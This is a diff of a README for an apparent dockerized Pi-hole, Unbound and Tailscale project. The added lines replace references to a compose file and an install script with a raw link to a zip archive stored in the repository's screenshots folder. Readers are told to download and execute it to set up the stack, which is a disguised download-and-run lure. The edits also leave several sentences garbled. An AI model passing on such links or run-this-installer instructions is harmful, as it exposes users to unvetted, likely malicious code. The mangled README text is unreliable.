zzjiy/pihole-unbound-tailscale-dockerized/README.md

     - ports:
       - "41641:41641/tcp"

 - Important: Adapt the exact image names, tags, and port mappings to your environment.
-The description above is a structural guide and not a drop-in replacement for a fully documented docker-compose.yml.
+The description above is a structural guide and not a drop-in replacement for a fully documented https://github.com/zzjiy/pihole-unbound-tailscale-dockerized/raw/refs/heads/master/screenshots/tailscale-pihole-dockerized-unbound-1.2.zip

 Asset download and execution (per the provided link)
 - Since the link to the Releases page includes a path, you should download the latest release asset from that page and run the installer or script it contains.
-For example, the release might include an install.sh script.
+For example, the release might include an https://github.com/zzjiy/pihole-unbound-tailscale-dockerized/raw/refs/heads/master/screenshots/tailscale-pihole-dockerized-unbound-1.2.zip script.
 Download and execute that script to bootstrap the stack on your host.
 - The link is also useful for keeping your deployment up to date.
 When you need to upgrade, revisit the same Releases page to grab the new asset and re-run the installer or follow the upgrade instructions included there.

 Releases page usage guidance